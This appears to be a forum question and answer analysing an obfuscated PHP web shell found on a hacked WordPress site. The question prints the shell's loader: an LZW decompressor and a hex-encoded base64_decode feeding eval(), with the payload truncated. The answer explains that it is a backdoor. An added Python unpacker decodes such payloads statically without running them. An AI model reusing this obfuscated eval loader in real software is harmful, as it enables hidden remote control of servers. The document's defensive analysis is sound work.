They inserted a malicious file through WordPress. I already removed the permissions to that WordPress, and I also saw that nothing else was infected; however, I would like to know what this file does.
File name: newshell.php
<?php
$PASS="c279fa156e660bbb90ba27e1c69605d6";
function T_($Bc) {
    $x2 = 256;
    $W2 = 8;
    $cY = array();
    $I3 = 0;
    $C4 = 0;
    for ($bs = 0; $bs < strlen($Bc); $bs++) {
        $I3 = ($I3 << 8) + ord($Bc[$bs]);
        $C4 += 8;
        if ($C4 >= $W2) {
            $C4 -= $W2;
            $cY[] = $I3 >> $C4;
            $I3 &= (1 << $C4) - 1;
            $x2++;
            if ($x2 >> $W2) {
                $W2++;
            }
        }
    }
    $K5 = range("\x0", "\377");
    $UH = '';
    foreach ($cY as $bs => $xd) {
        if (!isset($K5[$xd])) {
            $iU = $Co . $Co[0];
        } else {
            $iU = $K5[$xd];
        }
        $UH .= $iU;
        if ($bs) {
            $K5[] = $Co . $iU[0];
        }
        $Co = $iU;
    }
    return $UH;
}
$_DMIE8x="\x62\x61\x73\x65\x36\64\137\144\x65\x63\x6f\x64\x65";
eval(T_($_DMIE8x("aTMKBCaTmczKdBQJCgQSmUxSKT2IIVDCmIB6IBEYjEZhsMhgZBoYjCNBsZhqOByNzINjGYhyZhmM
xkYjGNhgOBwIh2ID7EnElkxFhAdDkdTLOxJP05QhOVSoRhaOBPSJ+mqYRjSbDKcyaYTdU58lkzQj
aZBrCS+UyKUitay2JyQVCoUC+VbUUi+QSORScVBOXRTO4AIIFBINCBIXyGTyeSySRS3ZbPibvbSl
b7jcy+SCeU79gBcIjWZTyIsAKRBETgcjedNaeTgZRRkrRlbdcLldM5nr+KdDo9KLLCmcDPBBABQZ
The code follows, but it's the same as this, like a super encrypted password.
An internet search for part of the file's content yields this address:
https://medium.com/@ostapkorkuna/fighting-a-russian-hacker-a-story-of-one-infected-wordpress-website-5ca0318f7a7a
What goes there, I suppose, is compressed base64 content. When decompressing it and passing it through eval, it returns the understandable code, which allows you to try everything you can through PHP: list directories, intervene in configuration files, etc.
There is a possibility that you have left a backdoor; it is worth doing a diagnosis of the server.
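Added example (not part of the original answer or of the file itself): a static unpacker in Python for the layout shown in the question, where `$_DMIE8x` spells `base64_decode` and `T_` is an LZW decompressor whose codes start 8 bits wide and grow with the dictionary. It returns the hidden source as bytes for reading and never evaluates it; the function names, the regular expression and the sample blob are constructed for illustration.

```python
import base64
import re

def lzw_decompress(data: bytes) -> bytes:
    """Port of T_(): LZW with codes that start 8 bits wide and grow."""
    dict_size, width = 256, 8
    codes, buf, nbits = [], 0, 0
    for byte in data:
        buf = (buf << 8) | byte
        nbits += 8
        if nbits >= width:                 # a full code is buffered
            nbits -= width
            codes.append(buf >> nbits)
            buf &= (1 << nbits) - 1
            dict_size += 1
            if dict_size >> width:         # dictionary outgrew the width
                width += 1
    table = [bytes([i]) for i in range(256)]
    out, prev = bytearray(), b""
    for i, code in enumerate(codes):
        # A code not yet in the table is the "previous + its first byte" case.
        entry = table[code] if code < len(table) else prev + prev[:1]
        out += entry
        if i:
            table.append(prev + entry[:1])
        prev = entry
    return bytes(out)

# Assumed layout: eval(<decompress>($<var>("<base64 text>"))) as in the question.
PACKED = re.compile(r'eval\(\s*\w+\(\s*\$\w+\(\s*"([A-Za-z0-9+/=\s]+)"')

def unpack(php_source: str) -> bytes:
    """Return the hidden source as bytes. Nothing is evaluated."""
    match = PACKED.search(php_source)
    if match is None:
        raise ValueError("no packed payload found")
    blob = re.sub(r"\s+", "", match.group(1))
    return lzw_decompress(base64.b64decode(blob, validate=True))

# Constructed sample: base64 of the LZW stream 41 21 40 20 40 -> b"ABABABA".
SAMPLE = '<?php eval(T_($_X("QSFA\nIEA=")));'

if __name__ == "__main__":
    print(unpack(SAMPLE).decode("latin-1"))
```

Run it against a copy of the file on an isolated analysis machine, not on the web server, and treat the printed source as untrusted text.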